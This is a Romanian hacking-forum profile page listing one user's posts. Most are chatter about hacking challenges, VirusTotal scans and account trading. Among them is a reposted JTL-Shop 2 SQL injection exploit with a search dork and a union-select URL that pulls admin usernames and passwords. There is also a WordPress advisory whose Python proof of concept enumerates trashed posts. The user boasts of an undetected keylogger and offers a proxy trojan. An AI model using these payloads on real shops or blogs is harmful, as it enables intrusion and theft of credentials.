-
Posts
214 -
Joined
-
Last visited
-
Days Won
1
Everything posted by trxtxx
-
l-a testat cineva ca as fi tare curios. va multumesc
-
Am nevoie de cineva priceput in SQLinjection
trxtxx replied to ciupardelpastel's topic in RST Market
este vulnerabil site-ul la sql i ? da-mi pm ca uit sa citesc mesajele. -
Backtrack 5 install on Samsung Galaxy S
trxtxx replied to Nytro's topic in Sisteme de operare si discutii hardware
foarte tare...eu care vroiam sa iau un galaxy acum o sa ma orientez si mai bine sarumana -
a mers pe localhost cu xampp si a trimis doar 3 mesaje. au pus filtru. l-au bubuit baietii sa speram ca cheater o sa il repare curand sa se bucure tot omu de aceasta minunatie. thanks cheater
-
Summary Win32/Banker is a family of data-stealing Trojans. When Win32/Banker is installed on a computer, it can capture banking credentials such as account numbers and passwords from the user. The Trojan can then send the captured information to the attacker by various means. Many variants of Win32/Banker may appear as greeting card software. Most Win32/Banker variants target customers of Brazilian banks. eSafe 7.0.17.0 2011.06.02 Win32.Banker e OK. si asa nu avem prea multe conturi noi bankare vinline VirusTotal - Free Online Virus, Malware and URL Scanner
-
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
trxtxx replied to Nytro's topic in Exploituri
ba astia nu pot sa se abtina sa nu devina ei faimosi au distrus bunatate de exploit. Nu i-am inteles niciodata pe astia ce vor sa publice ei tot si nici macar nu sunt ale lor in marea majoritate a cazurilor. -
va dau eu conturi cu PVA si fara la schimb cu altceva...imi dati pm care doreste ca am destule
-
Cum sa-ti umfli site-ul cu vizite&vizitatori folosind reddit?
trxtxx replied to Eureka's topic in Black SEO & monetizare
buna ideea, o sa incerc si eu pentur un site porno sa vedem cati ar intra Multumesc -
m-ar interesa dar nu ti se pare ca e cam criza sa ceri atat de mult ? Iti pot oferii 3000 USD asa prin iunie-iulie ma gasesti pe pm daca ai nevoie sa il dai rpd
-
multumesc pentru lista daca mai ai poti posta linistit
-
alta versiune nu am...tin sa zic ca am CACA asta de prin 99-2000 de cand au aparut si mi-a mers FFFF bine...trebuie doar sa ai ceva proxy-uri bune si poti face traffic in nesimtire, nu se blokeaza il poti seta pe ore diferite..face ce vrei ( in maxim 2 saptamani am gata trojanul pt proxy-uri si va pot da celor care vor...cu bani/fara bani depinde de cantitatea dorita proxy-uri pt asta si nu numai )
-
hozarares, iar scoti comori din suflet de la tine de acolo heheh good job
-
ultimul post a fost facut acum 1 an...smbgpla dece draqu reinvii topicuri...nu stii cum sa faci posturi ?puteai sa ii dai un mesaj frumos lu pax..il rugai pana la cer si pamant sa iti uploadeze undeva ca nu il ai si tu si vrei sa te joci cu el..si gata. daca eram in locul lu nytro iti dadeam ban. numai reinvia posturi. google/ sau da mesaj la persoana care a creat topicul daca vrei ceva.
-
foloseam php-ul tau local cu xampp...am zis multumesc si e super tare...eu doar m-am referit la .exe-ul ala nu la scriptul facut de tine care merge oricum SUPER bine pe local.
- 33 replies
-
fitty try this: RapidShare Webhosting + Webspace si mai vorbim e postat mai sus de virusz
- 33 replies
-
da ma asa e cum zici tu lasa ca il probez pe masina de lucru si daca e curata o sa va transmit. si unde se connecteaza si ce face. iar legatura cu frica era pt simplul fapt ca majoritatea zic nu uploada pe virustotal..WHY NOT ? daca tot e curat programul tau dece nu ? iar ce zici tu aici e un bullshit MARE rau. dar fiecare cu parerile lui, eu am postat ce am gasit pe virustotal, daca nu trebuia ghinion. ardeti si voi pe restul alta data. EDIT: dece mysqldumper al lu flash nu a fost detectat NICI pana acum a fiind ceva rau ?eh prosteala asta e pt newbies care nu stiu si dau click la intamplare. numai ca e urat sa iti infectezi proprii membrii mai ales cand ai MULTe posturi si fiind un om respectat. eu la asta m-am referit...nu la munca lui pt ca sunt sigur c a facut o munca deosebita facand programelul sa mearga si mai bine, bravo lui. eu m0am referit la posibile backdoor-uri ( am generalizat ) nu am zis de el.
- 33 replies
-
Virustotal. MD5: f76bfb9652608e587d2feb54f28f05b5 Suspicious.Insight Heuristic.BehavesLike.Win32.Backdoor.C Suspicious:W32/Malware!Gemini File PHP.Exploiter.exe received on 2010.02.20 20:48:35 (UTC) Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED Result: 17/41 (41.47%) ======== acum sper ca nu te superi ca am uploadat pe virustotal , daca tot e CURAT si nu are dece sa iti fie frica...o sa ramana curat nu ? am uploadat keylogger scris MANUAL acum 6 luni il uploadez pe virustotal odata pe luna cel putin, si acum este FUD si nu este vizibil fara crypteri fara nimik. anyway good job
- 33 replies
-
Rezultatele 1 - 10 din aproximativ 305.000 pentru " Powered by JTL-Shop 2". (0,22 secunde) JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability author : Lo$T (#) Home : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb><http://www.sa-hacker.com/vb> + www.sec-eviles.com/vb<http://www.sec-eviles.com/vb> email : H_CK@live.fr<mailto:H_CK@live.fr> Dork :" Powered by JTL-Shop 2" exp : http://server/Path/druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9 from tadminlogin-- Greetz TO :beloved560 + The S3r!0uS + SMDo EDIT:Example JTL-Shop2
-
WordPress >= 2.9 Failure to Restrict URL Access http://www.thomasmackenzie.co.uk/ 1. *Advisory Information* Title: WordPress >= 2.9 Failure to Restrict URL Access Date published: 2. *Vulnerability Information* Class: Failure to Restrict URL Access Remotely Exploitable: Yes Locally Exploitable: Yes 3. *Software Description* WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. [0] 4. *Vulnerability Description* Frequently, the only protection for a URL is that links to that page are not presented to unauthorized users. Security by obscurity is not sufficient to protect sensitive functions and data in an application. Access control checks must be performed before a request to a sensitive function is granted, which ensures that the user is authorized to access that function. [1] 5. *Vulnerable packages* Versions >= 2.9 6. *Non-vulnerable packages* Versions < 2.9 7. *Vulnerability Overview* Since version 2.9 a new feature was implemented so that users were able to retrieve posts that they may have deleted by accident. This new feature was labeled 'trash'. Any posts that are placed within the trash are only viewable by authenticated privileged users. 8. *Technical Description* When WordPress implemented the new feature they failed to change the permissions granted when the post is in the trash. This means that an unauthenticated user cannot see the post, however an authenticated user can no matter what privilege's they have, even 'subcriber'. "Subscriber [User Level 0] - Somebody who can read comments/comment/receive news letters, etc." [2] 9. *PoC* #/usr/bin/python # # WordPress > 2.9 Failure to Restrict URL Access PoC # # This script iterates through the WP post ID's as an authenticated and unauthenticated user. # If the requests differ a 'Trash' post has been found. # # You will need an authenticated user cookie of any privilege to run this script. # # Example cookie: # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8 # # Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types. # # # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r) import httplib # Declare vars blogURL = "www.example.com" userCookie = "ENTER_COOKIE_HERE" postID = 0 #Leave at 0 conn = httplib.HTTPConnection(blogURL) Headers = {"Cookie" : userCookie} print print "Target = http://" + blogURL + "/?p=" + str(postID) print while 1: # Start non authenticated enumeration request = '/?p=' + str(postID) conn.request("GET", request, "") try: r1 = conn.getresponse() except: print "Connection error" data1 = r1.read() # Start authenticated enumeration conn.request("GET", request, None, Headers) try: r2 = conn.getresponse() except: print "Connection error" data2 = r2.read() # Compare the HTML body reponses if data1 != data2: print "+ Found! http://" + blogURL + request else: print request postID += 1 conn.close() 10. *Credits* Thomas Mackenzie (tmacuk) - http://www.thomasmackenzie.co.uk/ Original finder and tester. Ryan Dewhurst (ethicalhack3r) - http://www.ryandewhurst.co.uk/ PoC creation and analysis. Arron Finnon (f1nux) - http://www.finux.co.co.uk/ Helped with documentation. Matthew Hughes - http://www.matthewhughes.co.uk/ Helped with documentation. Robin Wood (digininja) - http://www.diginija.org/ Helped identify the vulnerability type. 11. *References* [0] http://wordpress.org/ [1] http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access [2] http://codex.wordpress.org/Roles_and_Capabilities
-
pt 3 fi mai atent ce scrie acolo, nu ai cum sa nu iti dai seama, trebuie doar sa fi atent la 4 si 6 foloseste Firefox Add-on "FIREBUG" 5 Tamper data
-
heheh sunt pe locul 4
-
am facut si am reusit, nu am fost atent ca am vreo 10 site-uri deschise si imi tot apareau numai prostii si am inchis tamper-ul.oricum multumesc CyberWolf08 pt idee
-
mie imi arata toate 6, trebuie sa incepi sa le faci de la 1 la 4 sa iti scoata ultimele 2 in fine...apuca-te sa le faci si dupa vorbim cand te blokezi la 5
-
Hi, ir7ioli Score 50 NU pot sa fac lvl 5 nu inteleg ce trebuie